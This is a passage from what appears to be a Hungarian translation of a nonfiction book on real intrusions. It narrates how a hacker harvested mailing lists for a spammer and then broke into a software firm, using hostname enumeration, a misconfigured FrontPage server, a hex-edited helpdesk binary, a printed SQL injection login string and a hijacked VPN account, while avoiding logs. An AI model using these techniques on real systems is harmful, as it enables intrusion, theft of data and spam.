vállal el pénzért, ami miatt egyesek – a saját kifejezése szerint –
„szemét spammernek” fogják nevezni. Látni fogjuk, hogy nem
egyszerűen azért szemét, mert egy alkalommal spammerként dolgozott,
hanem azért, amilyen típusú spammelést végzett.
– Pénzt csinálni a haceklésből – mondja – tulajdonképpen egy
szemlélet. – Ez akár önigazolásnak tűnhet, azonban nincsen
lelkifurdalása, miközben megosztja velünk a történetét. Az az igazság,
hogy a maga jószántából állt elő vele.
És új kifejezést alkotva világította meg azt: – Úgy gondolom azt
mondhatnánk, hogy spacker vagyok – vagyis spammereknek dolgozó
hacker.
Felkeresett egy barátom, aki azt mondta: – Hardcore bondage
(kötözős) pornót akarok eladni több ezer embernek. Millió és millió
olyan ember e-mail címére van szükségem, akik hardcore bondage
pornót akarnak.
A kedves olvasó és én is valószínűleg elmenekülnénk egy ilyen ötlet
elől. Robert „gondolkodott rajta egy ideig”, majd úgy döntött, hogy
körbenéz, mi jöhet szóba. – Rákeresetem ezekre a hardcore bondage
oldalakra – mondja, bevallva, hogy mindezt annak ellenére tette, hogy
„a barátnőmet az egész nagyon undorította”. Rendkívül egyszerűen
hajtotta végre a keresést: a Google-vel, illetve egy másik, több
keresőmotort használó keresőportállal, a www.copernic.com-mal.
Az eredményekből létrejött a munkalista. – Egyetlen dolgot akartam
tudni ezekből [az oldalakból], hogy ki szereti a bondage pornót, ki akar
értesítést a frissítésekről, kit érdekel ez a szar. – Robert úgy gondolta,
hogy ha segíteni is fog a spam létrehozásában, nem akarta úgy csinálni,
„mint az a sok hülye”, akik több száz e-mailt küldenek boldog
boldogtalannak attól függetlenül, hogy azok mutattak-e bármilyen
érdeklődést a témában.

A levelezőlisták megszerzése

A bondage weboldalak többsége, ahogy Robert felfedezte, egy


ismertebb alkalmazást használt a levelező listákra való feliratkozás
kezelésére; nevezzük ezt az alkalmazást SubscribeListnek.
Csupán a Google használatával sikerült találnom valakit, aki rendelt
egy másolatot [a SubscribeListből], és a webszerveren tartotta. Azt
hiszem, egy Tajvanban vagy Kínában levőweboldal volt.
A következő lépés könnyebb volt, mint ahogy várta:
A webszerverük hibásan volt konfigurálva. Bármely felhasználó
megnézhette a szoftver forrás[kód]ját. Nem a legfrissebb verziója volt
a szoftvernek, de elfogadhatóan friss volt.
A hiba az volt, hogy valaki gondatlanságból vagy véletlenül a
webszerver gyökerében felejtette a forráskód betömörített másolatát.
Robert letöltötte a forráskódot.
Robert úgy okoskodott, hogy ezzel a programmal és a létező
oldalakról megszerzendő nevekkel:
Képes leszek e-maileket kiküldeni, amelyek azt írják: „Jöjjön vissza
az oldalamra, ahol különleges korbácsolás van féláron.”
Rengetegen feliratkoznak ezekre a dolgokra.
Noha már megvolt a levelezőlista szoftvere, még nem voltak
levelezőlistái.
Nekiült, hogy tanulmányozza a SubscribeList forráskódját, és végül
felfedezett egy lehetőséget, aminek technikai magyarázata igen
bonyolult (lásd a fejezet végén levő Betekintés című részt).
Hasonlóan ahhoz, ahogy az előző történetben szereplő hacker az
szimbólumot használva parancsokat adott ki a programnak, Robert a
„setup.pl” egy hibáját használta ki. Ez a „backticked változó betáplálási
hiba” nevű hiányosság azon alapul, hogy egy telepítő program, a
setup.pl szkript nem megfelelően érvényesíti a neki átadott adatokat.
(A különbség az operációs rendszerben van. Erik módszere Windows,
Roberté Linux alatt működik.) A rosszindulatú támadó olyan
adatsztringet küldhet el, amely úgy változtat meg egy változóban tárolt
értéket, hogy a szkriptet egy tetszőleges parancsokat végrehajtó másik
Perl szkript létrehozására lehet utasítani. Ennek a programozói
felületességnek köszönhetően a támadó shell parancsokat tud bevinni.
A módszer elhiteti a setup.pl-lel, hogy a támadó éppen telepítette a
SubscribeListet, és a kezdeti beállításokat akarja elvégezni. Robert
minden olyan cégnél képes lesz elsütni ezt a trükköt, amely a
szoftvernek a sebezhető verzióját futtatja. Hogyan talált olyan bondage
céget, amely megfelelt ennek a kritéreiumnak?
Kódja, mondja Robert, „komoly agymunka, igazi szörnyeteg”.
Amikor a szkript lefut, eltakarít maga után, és visszaállítja a
konfigurációs változókat, hogy senki ne tudja megmondani, hogy
bármi is történt. – És amennyire én tudom, soha senki nem vette még
észre.
Egyetlen körültekintő hacker sem küldte volna ezeket a fájlokat
lekövethető módon a saját e-mail címére.
Igazán nagy rajongója vagyok a világhálónak. Szeretem a webet. A
web névtelen. Ha egy Internet kávézóból csatlakozol, senki nem tudja,
hogy ki a fene vagy. A cuccom párszor körbejárta a földet, és így
nincsen közvetlen kapcsolat. Nehezebb lekövetni, és mindösszesen talán
csak egy-két sor lesz az egészről a [cég] naplófájljában.

Pornó kifizetés

Robert felfedezte, hogy sok bondage oldal használja ugyanazt a


levelezőlista szoftvert. A módosított programjával célba vette ezeket az
oldalakat, és megszerezte a levelezőlistáikat, amiket átadott barátjának,
a spammernek. Robert szeretné, ha megértenénk, hogy „ez nem
közvetlen spammelés volt”.
A kampány hihetetlenül hatékony volt. Amikor közvetlenül olyan
embereknek küldenek reklámot, akikről már tudják, hogy „igazán
szeretik ezt a szart” (hogy Robert találó kifejezését használjuk), a
válaszolási arány minden rekordot megdönt.
Általában 0,1 vagy 0,2 százalékos [válaszolási arányra] lehet
számítani. A célzott spammeléssel legalább 30 százalékot értünk el. Az
emberek körülbelül 30-40 százaléka vásárolt. Spammelési aránynak ez
hihetetlenül magas.
Végül olyan 45-50 ezer dollárt hoztam neki, aminek megkaptam a
harmadát.
Ennek az aljas történetnek a sikere mögött Robert sikere áll, akinek
sikerült megszereznie olyan emberek levelezőlistáját, akik hajlandók
pénzt kiadni ilyen dolgokért. Ha az általa mondott számok pontosak,
akkor ez szomorú jelzőszám a világról, amelyben élünk.
– Körülbelül 10-15 millió nevet szedtem össze – mondta.

ROBERT, AZ EMBER

A történet ellenére Robert ragaszkodik ahhoz, hogy „nem vagyok


valami piszkos kis spammer; nagyon is egyenes ember vagyok”. A
történet többi része valóban alátámasztja állítását. Egy „nagyon
vallásos és becsületes cég” biztonsági osztályán dolgozik, és független
biztonsági tanácsadóként külső projekteket is elvállal. Ezen túlmenően
biztonsági témák avatott szerzője.
Különösen szórakoztatónak találtam, amikor a hackeléssel
kapcsolatos hozzáállásáról beszélt:
Nagyon szeretem, amikor egy rendszer kihívást állít elém, és jobban
szeretek a rendszerrel konfigurációs és társadalmi szinten, nem pedig
szigorúan műszaki szinten megküzdeni. A társadalmi szint alatt azt
értem, hogy bejussak a számítógép mögött levőember [fejébe].
Robertnek hosszú hackelési múltja van. Említette egy barátját (egy
amerikai hackert, akinek nevét nem akarta elárulni), akivel volt egy
közös játékuk.
Mindketten meghackeltünk egy csomó fejlesztőcéget, olyanokat,
amelyek Active X vezérlőket és Delphi vezérlőket, illetve ügyes kis
programozó eszközöket készítettek. Kerestünk egy magazint a témában,
amelyben minden második oldalon az új termékek hirdetései találhatók.
És néztük, hogy találunk-e olyat, amit még nem hackeltünk meg.
Különösen a játékokra hegyeztük ki a dolgot.
A főbb játékszoftver cégek belső hálózatán „barangolt”, és
megszerezte némely játékuk forráskódját.
Végül ő és hackercimborája kezdtek rájönni, hogy „lényegében
mindenkihez betörtünk, aki új terméket reklámozott ott. Ez megvolt, ez
is, ez is... „Ezzel még próbálkozunk, de ez már megvan.”
Robert számára volt egy különösen érdekes terület; a „video-
utómunka” szoftvertermékek – különösképpen azok, amelyeket
mozgóképben levő animációk létrehozására használtak.
Szeretem azt az összevisszaságot, ami ezekben van. Valami igazi
zsenialitás van az ezeket előállító dolgokban. Szeretem olvasni őket és
tudni, hogy hogyan működnek, mert annyira földön kívülinek tűnik,
amikor nézed. Úgy értem, hogy amikor nézed a tv-ben [az animált
mozgóképet], olyasmit mondasz, hogy „B_a meg, ez aztán valami.”
Ami különös kíváncsisággal tölti el, az a kód pusztán matematikai
szinten való tanulmányozása – „az egyenletek és a függvények, és az
ezeket alkotó emberek gondolkodása. Fantasztikus.”
Mindezek együtt indították el azon az úton, amit a
legemlékezetesebb hackelésének tart.

A csábító szoftver

2003-ban Roben termékbejelentésről olvasott az egyik


szoftvermagazinban. Egy olyan új termékről volt szó, amely „digitális
videoeffekteket, megvilágításokat kínált – amelyek valósághű
megvilágítást eredményeznek hihetetlenül sima textúrákkal”.
A termék értékesítési esélyeit nagyban növelte, hogy egy
nemrégiben bemutatott híres filmben is ezt használták – egyike volt az
alkotók által alkalmazott tervező, modellező és renderelő eszközöknek.
Amikor hallottam róla, igazán szupernek tűnt. És a köreimben
például a neten mozgó emberek közül némelyiket nagyon érdekelte ez a
szoftver Sokan rá akarták tenni a kezüket.
Mindenki meg akarta kapni ezt az alkalmazást, mert nehéz
megszerezni, nagyon drága – úgy talán két-három ezer [dollár].
Olyanok használják, mint például az Industrial Light and Magic [a
Lucasfilm leányvállalata], és talán ha a világon négy-öt másik cég
megvette még.
Mindenesetre nagyon ráizgultam, hogy megszerzem a szoftvert, és
elhatároztam, hogy megpróbálkozom a céggel Egyszerűen X cégnek
fogom hívni. Így jó? Az X cég teljes egészében amerikai székhelyű volt,
és a teljes hálózatuk központosítva volt.
Robert célja nem egyszerűen a szoftver saját felhasználásra való
megszerzése volt, hanem hogy az világszerte az Internet-felhasználók
milliói számára elérhető legyen.
Kiderítette, hogy a cégnek „volt kint egy tűzfala és egy kemény kis
hálózata. Rengeteg szerverük, és több webszerverük volt. Ebből azt
gyanítottam, hogy körülbelül 100, 150 alkalmazottjuk lehet.”

A szervernevek kiderítése

Robertnek állandó stratégiája van a jelentős méretű céges


hálózatokban való betöréshez. – Utánajárok, hogy miként
gondoskodnak arról, hogy az embereik képesek legyenek bejutni
hálózatukba. Egy nagy cégnek ez sokkal nagyobb kihívás, mint egy
kicsinek. Ha öt alkalmazottad van, e-mailt küldesz nekik, nem? Vagy
egyenként személyesen elmondod nekik, hogy „így kell csatlakozni
otthonról a szerverre, így tudod otthon letölteni az e-mailjeidet”.
Egy nagy cégnél azonban van általában egy helpdesk vagy
valamilyen külső forrás, amelyhez számítógépes probléma esetén az
emberek fordulhatnak. Robert arra számít, hogy egy nagyszámú
alkalmazottat foglalkoztató cégnél lesznek olyan utasítások, amelyek a
fájlok és e-mailek távoli hozzáférésének módját magyarázzák el – és
ezek legvalószínűbben a helpdeskjüknél találhatók. Ha megtalálja
ezeket az utasításokat, valószínűleg megismeri a hálózathoz kívülről
történő csatlakozás lépéseit, így például a belső hálózathoz a céges
VPN-en keresztül csatlakozáshoz szükséges szoftvert. Különösképpen
abban reménykedett, hogy kiderítheti, melyik hozzáférési pontokat
használják a fejlesztők a fejlesztő rendszerhez kívülről történő
belépéshez, mivel nekik minden bizonnyal hozzáférésük van a hőn
áhított forráskódhoz.
Így ennél a pontnál az első számú kihívás a helpdeskhez vezető út
megtalálása volt.
Egy NetWork Mapper nevű segédalkalmazást kezdtem használni,
amit én magam írtam. Tulajdonképpen azt csinálja, hogy
szekvenciálisán végigmegy a tipikus hostnevek listáján. Szekvenciális
DNS feloldóként szoktam használni.
A NetWork Mapper hostokat azonosít, és megadja a hozzájuk
tartozó IP-címet. Robert rövid Perl szkriptje egyszerűen végigfutott a
gyakran használt hostnevek egy listáján, és ellenőrizte, hogy az adott
név létezett-e a célba vett cég tartományában. így például egy
„digitaltoes” nevű cége elleni támadás esetén a szkript
web.digitaltoes.com, mail.digitaltoes.com stb. nevű hostokat keres.
Ezzel a támadó képes a rejtett IP-címeket vagy az egyszerűen nem
azonosítható hálózati blokkokat feltárni. A szkript futtatása esetén az
alábbihoz hasonló eredményeket kaphat vissza:
beta.digitaltoes.com
IP Address #1:63.149.163.41…
ftp.digitaltoes.com
IP Address #1:63.149.163.36…
intranet.digitaltoes.com
IP Address #1:65.115.201.138…
mail.digitaltoes.com
IP Address #1:63.149.163.42….
www.digitaltoes.com
IP Address #1:63.149.163.36…
– Ebből kiderülne, hogy a képzelt „digitaltoes” cégnek van néhány
szervere a 63 l49-es netblokkban, azonban én személy szerint a 65.115-
ös netblokkban levő „intranet” nevű szerverre tenném a pénzem, ha a
belső hálózatukat keresném.

Egy kis segítség a helpdesk.exe-től

Robert reményei szerint az általa a Network Mapperrel felfedezett


szerverek között volt a keresett szerver: helpdesk.Xceg.com. Amikor
azonban megpróbált belépni az oldalra, egy bejelentkezési
párbeszédablak jelent meg, amely felhasználói nevet és jelszót kérve
jogosult felhasználókra korlátozta a belépést.
A helpdesk alkalmazás egy IIS4-et, a Microsoft Internet Information
Server (IIS) szoftverének egy ősi változatát futtató szerveren volt,
amelynek Robert számos sebezhetőségét ismerte. Kis szerencsével
találhat egy olyat, amelyre még nem telepítettek biztonsági javítást.
Eközben egy tátongó biztonsági rést is felfedezett. Valamelyik céges
rendszergazda úgy kapcsolta be az MS FrontPage-et, hogy bárki
feltölthetett vagy letölthetett fájlokat a gyökérkönyvtárból, ahol a
webszerver fájlokat tárolták.
(Ismerem ezt a problémát. A biztonsági cégemnél levő egyik
webszervert egy hasonló sebezhetőséget kihasználva hackelték meg,
mert a nekem segítő önkéntes rendszergazda nem megfelelően
konfigurálta a rendszert. Szerencsére a szerver különálló rendszer volt
egy saját hálózati szegmensen.)
Felismervén, hogy ez a hiba lehetőséget adott neki arra, hogy
fájlokat töltsön fel és le a szerverről, elkezdett vizsgálódni, hogyan van
beállítva a szerver.
A leggyakoribb hiba egyes buta IIS szervereknél az, hogy [bárki is
állította be azt] bekapcsolja a FrontPage szerkeszthetőséget.
És valóban, ennek az oldalnak is megvolt a gyengesége. A Microsoft
FrontPage (HTML dokumentumok egyszerű létrehozására és
szerkesztésére használt alkalmazás) a megfelelő fájlengedélyek
beállítása nélküli használata gyakran a rendszergazda felületességének
köszönhető, néha azonban kényelmi okokból szándékosan így állítják
be. Akármi is volt az ok, ez most azt jelentette, hogy nem csak hogy
bárki olvashatta a fájlokat, hanem fájlokat tölthettek fel bármely nem
védett könyvtárba is. Robert teljesen beindult.
Néztem és azt gondoltam, „szent szar, felhasználói név és jelszó
nélkül olvashatom a szerveren levőösszes oldalt”.
Így be tudtam jelentkezni, és megnéztem a webszerver
gyökérkönyvtárát.
Robert úgy véli, hogy a legtöbb hacker kihagyja ezt a lehetőséget.
A dolog úgy áll, hogy amikor beállítják egy szerver hálózati
letapogatását, nem keresnek gyakori hibás beállításokat az olyan
szerverkiterjesztéseken, mint a FrontPage. Megnézik [hogy milyen
típusú szerver] és azt mondják, „hát ez csak egy Apache” vagy „ez
IIS.” És kihagyják annak a lehetőségét, hogy megkönnyítsék saját
munkájukat, ha a FrontPage hibásan van konfigurálva.
Nem volt akkora áldás, mint ahogy várta, mivel „igazából nem sok
minden volt azon a szerveren”. Azt még észrevette, hogy egy
helpdesk.exe nevű alkalmazás jött elő, amikor a böngészőn keresztül
fért hozzá az oldalhoz. Ez igen hasznos lehetett, azonban felhasználói
nevet és jelszót kért.
Szóval nézem és arra gondolok, hogy a fenébe támadhatom meg?
Nagyon nem szeretek más fájlokat feltölteni egy webszerverre, mert ha
a rendszergazdák megnézik a webnaplóikat, és látják, hogy ezer ember
megy a helpdesk.exe-hez, és hirtelen egy valaki a Csendes-óceán déli
részéről a two.exe-hez vagy valami máshoz megy, akkor azon azért
elgondolkodnak, nem? Inkább megpróbálok a naplóikon kívül maradni.
A helpdesk alkalmazás egyetlen futtatható és egy dinamikus
csatolású könyvtár (DLL) fájlból állt (a.DLL kiterjesztésű fájlok egy
alkalmazás meghívható Windows függvényeinek gyűjteményét
tartalmazzák).
Azzal, hogy képes volt a webgyökérbe fájlokat feltölteni, a támadó
könnyedén feltölthetett egy egyszerű szkriptet, amely lehetővé tette
számára, hogy böngészőjén keresztül adjon ki utasításokat. Azonban
Robert nem egyszerű támadó volt. Büszke rá, hogy rejtve maradt, és
alig vagy egyáltalán nem hagyott nyomokat a webszervernalpókban. A
testre szabott szkript egyszerű feltöltése helyett letöltötte
számítógépére a helpdesk.exe és a helpdesk.dll fájlokat, hogy korábbi
tapasztalataira támaszkodva elemezni tudja az alkalmazás működését. –
Jó néhány visszafejtést végeztem már el és az assemblerben néztem
meg a dolgokat – így tudta, hogy hogyan dolgozza fel a befordított C
kódot és hogy fejtse vissza nagy részét az assemblerbe.
Az IDA Pro, az Interactive Disassembler nevű, a www.ccso.com
által értékesített programhoz nyúlt, amelyet elmondása szerint
„rengeteg vírusirtó és féregkereső programot gyártó cég használ arra,
hogy assembler szintre fordítson vissza valamit, elolvassa, és
megpróbálja kitalálni, hogy mit csinál.” Visszafordította a
helpdesk.exe-t, és elismerve a professzionális programozók által
végzett munkát, belátta, hogy „elég jól meg volt írva”.

A hacker varázstárából; az „SQL injection” támadás

Miután visszafordította a programot, Robert megvizsgálta a kódot,


hogy lássa, vajon a helpdesk alkalmazás sebezhető volt-e „SQL
injection”-nel (SQL parancsok illegális elhelyezésével), amely egy
gyakori programozói hibát kihasználó támadási módszer. A
biztonságtudatos programozó megtisztítja a felhasználói lekérdezéseket
azáltal, hogy olyan kódot szúr be, amely – többek között – az olyan
különleges karaktereket szűri, mint az aposztróf, az idézőjel és a
kisebb, mint (<), illetve a nagyobb, mint (>) szimbólumok. Az ilyen
karakterek kiszűrése nélkül az ajtó tárva-nyitva a rosszindulatú
felhasználók előtt, hogy az alkalmazásokat megtrükközve a rendszer
teljes feltöréséhez vezető manipulált adatbázis-lekérdezéseket
futtassanak.
Robert azt találta, hogy a helpdesk alkalmazást megfelelő
ellenőrzésekkel látták el, hogy megakadályozza az SQL parancsok
illegális elhelyezését. A legtöbb hacker egyszerű feltöltene a
webszerverre egy ASP szkriptet, és ezzel kész lenne, Robert azonban
sokkal jobban törődött azzal, hogy észrevétlen maradjon, semmint egy
egyszerű sebezhetőség kiaknázásával törje fel a célpontot.
Azt gondoltam: ~ Ez igen szórakoztató, nagyon király. Élvezni
fogom.
Azt mondtam magamban: – Hát akkor az érvényességi ellenőrzés
tönkretételével fogom lehetővé tenni az SQL parancsok illegális
elhelyezését. – Megtaláltam a sztringet, ahol az érvénytelen
karaktereket tárolták, és – ha jól emlékszem – mindet szóközre és
tildére (~) vagy valami olyasmire változtattam, amit nem fogok
használni, de ugyanakkor semmi más nem fog megzavarni.
Más szavakkal úgy módosította a programot (a hex-szerkesztőt
használta a felhasználói input ellenőrzésére tervezett rutin
„feltörésére”), hogy az többé nem utasította vissza a különleges
karaktereket. Ily módon titkosan, az alkalmazás bárki más felé történő
viselkedésének megváltoztatása nélkül tudott illegális SQL parancsokat
bevinni. Egy másik előnye a módszernek, hogy a rendszergazdák
valószínűleg nem fogják ellenőrizni a helpdesk alkalmazás
sértetlenségét, mivel nem lesznek nyilvánvaló jelei annak, hogy valaki
meghamisította.
Robert ekkor elküldte a helpdesk általa módosított változatát a
webszervernek, és lecserélte vele az eredeti változatot. Ahogy az
emberek bélyegeket, képeslapokat vagy gyufásdobozokat gyűjtenek
azokról a helyekről, ahol jártak, néha a hackerek sem csak a betöréseik
zsákmányát őrzik meg, hanem az ahhoz felhasznált kódot is. Robertnek
a mai napig megvan az általa létrehozott futtatható kódnak a binárisan
fordított másolata.
Mivel otthonról dolgozott (nagyon merész, és egyáltalán nem
ajánlott, csak valaki le akar bukni), a helpdesk alkalmazás „új és
javított” változatát proxy-szerverek láncolatán keresztül töltötte fel.
Ezek a szerverek közvetítőként működnek a felhasználó számítógépe,
illetve az általa elérni kívánt számítógép között. Ha egy felhasználó az
A számítógépen levő forrást kéri, a kérés a proxy szerverhez lesz
irányítva, amely megteszi a kérést, választ kap az A számítógéptől,
majd továbbítja a választ a kliensnek.
A proxyszervereket jellemzően a világhálón levő források tűzfalon
belülről történő eléréséhez használják. Robert a világ különböző
részein elhelyezett több proxyszerver használatával növelte a saját
biztonságát azáltal, hogy csökkentette az azonosíthatóság
valószínűségét. Az úgynevezett „nyitott proxykat” gyakran használják
ily módon a kibertámadás eredetének elrejtésére.
Miután feltelepítette és elindította a helpdesk alkalmazás módosított
változatát, Robert az Internet böngészőjét használva csatlakozott a
céloldalhoz. Amikor a felhasználói nevet és jelszót kérő beviteli
űrlappal találta magát szemben, elindított egy egyszerű, a terveinek
megfelelő SQL injection támadást. Rendes körülmények között,
amikor egy felhasználó beviszi a felhasználói nevét és jelszavát – ami
mondjuk „davids” és „zl8M296q” az alkalmazás a következőhöz
hasonló SQL utasítás létrehozására használja a bevitt adatokat:
select record from users where user = 'davids' password =
'zl8M296q'
Ha a felhasználói név és a jelszó mezők megegyeznek az
adatbázisban levő értékekkel, akkor a program belépteti a felhasználót.
Ennek így kell működnie; Robert SQL injection támadása azonban az
alábbiak szerint zajlott: a felhasználói név mezőbe a következőket vitte
be:
' or where password like'%--
A jelszónál még egyszer ugyanezt az utasítást adta meg:
' or where password like'%--
Az alkalmazás ezeket az inputokat használta az SQL utasítás
létrehozására, amely valahogy így nézett ki:
select record from users where user = '' or where password like '%'
and password = '' or where password like '%'
Az or where password like % elem azt mondja az SQL-nek, hogy
akkor küldje vissza a rekordot, ha a jelszó mezőben adatot talál (a a
wildcard, vagyis helyettesítő karakter). Tekintettel arra, hogy a jelszó
megfelelt ennek az értelmetlen követelménynek, az alkalmazás jogosult
felhasználónak tekintette Robertet, mintha hiteles felhasználói
azonosítókat vitt volna be. Ezt követően a felhasználói adatbázis első
helyén szereplő személy belépési azonosítóival léptette be, aki
általában egy rendszergazda szokott lenni. Itt sem volt ez másképp.
Robert nem egyszerűen csak belépett, hanem rendszergazdai
jogosultságokkal jutott be.
Innen már látta a nap üzenetét, amelyet egy alkalmazott vagy más
jogosult felhasználó a sikeres belépés után lát. Ezen üzenetek
sorozatából információkat szedett össze a hálózatba való betárcsázásra
használt számokról, illetve különösképpen azokról a hiperlinkekről,
amelyekkel felhasználókat lehet hozzáadni vagy eltávolítani a
Windows alatti VPN csoportból. A cég a Microsoft VPN szolgáltatását
használta, amely úgy van beállítva, hogy az alkalmazottak a Windows-
os fióknevüket és jelszavukat használják a bejelentkezéshez. És mivel
Robert rendszergazdaként jelentkezett be a helpdesk alkalmazásba, ez
lehetővé tette számára, hogy felhasználókat adjon a VPN csoporthoz,
illetve megváltoztassa a Windows-os fiókok felhasználói jelszavát.
Előrelépés. Mégis idáig csupán annyi történt, hogy
rendszergazdaként jelentkezett be egy alkalmazásba, de nem jutott
közelebb a forráskódjukhoz. Következő célja az volt, hogy a VPN
beállításukon keresztül hozzáférést szerezzen belső hálózatukhoz.
Csupán kísérletképpen megpróbálta a helpdesk menüjén keresztül
megváltoztatni egy látszólag alvó fiók jelszavát, és hozzáadta azt a
VPN felhasználókhoz és a rendszergazdák csoportjához – ami azt
eredményezhette, hogy tevékenységét kevésbé valószínű, hogy észre
fogják venni. Megismerte a VPN konfigurációjuk néhány részletét, így
ez után „be tudtam VPN-ezni. Ez jó, csak egy kicsit lassan játszik.”
Ottani időszerint hajnali egykor mentem be. Mivel az ausztrál
időzónában voltam, számomra ez nagykőn kényelmes volt.
Amerikában hajnali egy van, de itt fényes nappal. Akkor akartam
bemenni, amikor biztos lehetek benne, hogy a hálózat üres, nem
szerettem volna, ha bárki bejelentkezik, vagy valaki észrevesz. Talán
aktív jelentéseik vannak mindenkiről, aki belép. Biztosra akartam
menni.
Robertnek megvan az az érzéke, hogy megértse, hogyan dolgoznak
az informatikai és hálózatbiztonsági szakemberek, és általában bizony
ők semmiben nem térnek el a többi dolgozó ember szokásaitól. – Csak
akkor vehették volna észre [hogy csatlakoztam], ha aktívan átnézték
volna a naplókat. – Nem túl hízelgő véleménnyel van az informatikai
és biztonsági szakemberekről. – Az emberek nem olvassák el minden
reggel a naplókat. Amikor az íróasztalukhoz érnek, leülnek, isznak egy
kávét, elolvassák a személyes érdeklődésüknek megfelelő
webolodalakat. Nem az van, hogy bemennek és azonnal elolvassák a
naplókat, hogy lássák, ki változtatta meg tegnap a jelszavát.
Hackelési tevékenysége során kitapasztalta, mondja Robert, hogy
„ha megváltoztatsz valamit egy oldalon, akkor azt az emberek vagy
azonnal észreveszik, vagy soha. Azon a webes alkalmazáson
végrehajtott változást akkor vették volna észre, ha olyasvalamit
futtatnak, mint a Tripwire, mondta, egy a rendszerprogramok és egyéb
alkalmazások sértetlenségét ellenőrző alkalmazásra utalva, amely
kriptográfiai ellenőrző összeget számol, és összehasonlítja azt az ismert
értékeket tartalmazó táblázatban szereplő értékekkel. – Észrevették
volna, hogy a futtatható program megváltozott.
Ennél a pontnál megnyugodott, és a ma már ismerős kifejezést, az
„M&M biztonságot” említette – kívül kemény, de belül lágy és olvad. –
Senkit nem nagyon érdekel, ha valaki körbenézel a hálózatán, mivel
akkor már a területen belül vagy. Ha sikerült áthatolni a külső
biztonsági védelmen, akkor már otthon érezheted magad – mondja. (A
kifejezés azt jelenti, hogy ha egy támadó már belül van, és úgy
használja az erőforrásokat, mint egy jogosult felhasználó, akkor nagyon
nehéz észrevenni a jogosulatlan tevékenységét.)
Robert azt tapasztalta, hogy a helpdesk alkalmazáson keresztül
eltérített fiók (vagyis amelynek megváltoztatta a jelszavát) a Microsoft
VPN szolgáltatáson keresztül beengedte a hálózatba. Számítógépe
ekkor a cég belső hálózatához volt kapcsolva, pontosan úgy, mintha
egy a cég épületében levő, a hálózathoz fizikailag csatlakoztatott
számítógépet használna.
Idáig gondosan ügyelt arra, hogy semmi olyat ne csináljon, ami
olyan naplóbejegyzést hozna létre, amit egy lelkiismeretes
rendszergazda észrevehetne, és szabadon vitorlázott a rendszerben.
Amint a cég belső hálózatához kapcsolódott, Robert feltérképezte a
Windows-os számítógépneveket, és olyan nevű gépeket talált, mint
FINANCE, BACKUP2, WEB és HELPDESK. Talált más gépeket is
bizonyos személyek, ezek nyilvánvalóan az egyes alkalmazottak
számítógépei voltak.
Ami a szerverek nevét illeti, a cégnél valakinek furcsa humorérzéke
lehetett, ami nem ismeretlen a high-tech világában. A trend az Apple
Computernél kezdődött a fellendülés első napjaiban. Steve Jobs a maga
kreatív vénájával és „hágjunk át minden szabályt” megközelítésével
úgy döntött, hogy a cég épületeiben levő tárgyalótermeket nem 212A
vagy Hatodik emeleti tárgyaló vagy valami más hétköznapi és unalmas
néven fogják hívni. Ehelyett az egyik épületben rajzfilmfigurák, a
másikban filmsztárok stb. után nevezték el a tárgyalókat. Robert azt
látta, hogy a szoftvercég valami hasonlót tett a szervereivel, csak
tekintettel az animációs iparral fennálló szoros kapcsolataikra, az
általuk választott nevek között híres animációs figurák voltak.
Azonban nem az egyik vicces nevű szerver vonzotta, hanem amit
BACKUP2-nek hívtak. Kutatása itt végre sikerrel járt: talált egy
Johnny nevű nyitott hálózati megosztást, ahova egy alkalmazott egy
csomó fájljának biztonsági mentését helyezte. Ez a személy elég
kényelmesnek és a biztonsággal kapcsolatban nem túlzottan
aggodalmaskodónak tűnt. A könyvtárban levő fájlok között volt egy
Outlook személyes fájlmappa, amely az összes elmentett e-mailjét
tartalmazta. (A hálózati megosztás egy merevlemezt vagy egy
merevlemez olyan részét jelenti, amelyet szándékosan úgy állítottak be,
hogy mások hozzáférhessenek az ott levő fájlokhoz.)

A biztonsági mentés készítésének veszélyei

Legtöbbünkben az a közös, hogy amikor biztonsági mentést


kívánunk végrehajtani, akkor meg akarjuk könnyíteni a saját dolgunkat.
Ha van elég hely mindenről biztonsági mentést készítünk. Majd
elfeledkezünk róla. Az elfekvő mentések száma hihetetlen magas is
lehet. Az emberek egyszerűen hagyják őket felgyűlni, és senki sem
gondol az eltávolításukra, mígnem a szerveren vagy a backup eszközön
elfogy az üres terület.
– Gyakran – állapítja meg Robert – a biztonsági mentés kritikus,
lényeges, megdöbbentő információkat tartalmaz, amire senki nem
gondol, mivel ez a biztonsági mentés. Nagyon alacsony biztonsági
szinten kezelik. – (Fiatalabb koromban, amikor magam is
hackerkedtem, ugyanezt tapasztaltam. Egy cég hajlandó mindent
elkövetni bizonyos adatainak védelmében, azonban ugyanezen adatok
biztonsági mentéseit nem kezelik a kellő fontossággal. Amikor
szökésben voltam, egy olyan ügyvédi irodának dolgoztam, ahol a
biztonsági mentést tartalmazó szalagokat a védett számítógépes szoba
bejárata mellett egy dobozba helyezték, amit egy külsős tároló cég vett
fel onnan. Bárki a lebukás legkisebb veszélye nélkül ellophatta volna a
szalagokat.) A BACKUP2 szerveren felfedezett egy megosztott
területet, ahol valaki biztonsági mentést csinált mindenéről. Elképzelte,
ez hogyan történhetett, és a történet biztos sokaknak ismerős lesz:
Egyik nap ez a fickó sietett. Azt gondolta: – Biztonsági mentést kell
erről csinálnom – és meg is csinálta. És három-négy hónappal később
még mindig ott volt az anyag.
Szóval ez sajnálatot kelt bennem a hálózat, illetve a hálózati
rendszergazdák működése iránt, mivel ez nem valami fejlesztővagy
hozzáférés nélküli alkalmazott volt. Ez olyan valaki volt, aki hálózati
megosztást hozhatott létre, de nyilvánvalóan nem törődött túlzottan a
biztonsággal.
Robert így folytatta:
Ha annyira biztonságtudatos lett volna, mint én, akkor jelszóval
védte volna a megosztást és talán valami véletlenszerű névvel nevezte
volna el. És később eltávolította volna.
Ami Robert szempontjából még jobb volt, „az Outlookjának egy
másolata is ott volt” minden címmel és kontaktszeméllyel. –
Kimásoltam az archív fájlt – mondja Robert. – Kinyertem az összes e-
mailjét tartalmazó Outlook.ps fájlját, amely úgy 130-140 mega volt.
Kijelentkezett, és néhány órát a fickó e-mailjeinek olvasásával
töltött. Talált többek között „nyilvános bejelentéseket, fizetési
változásokat, teljesítmény értékeléséket, a fickóról szinte mindent. Elég
sok információt megtudtam róla – egyike volt a vezető hálózati
rendszergazdáknak, és ő felelt az összes Windows-os szerverért –
mondta Robert. – És rajta keresztül megtudtam, kik voltak a további
rendszergazdák, és kiknek volt széles hozzáférése. – Egyre jobban
alakultak a dolgok:
A levelezésében levőinformációk rendkívül hasznosak voltak. Össze
tudtam állítani olyan emberek listáját, akik valószínűleg hozzáfértek az
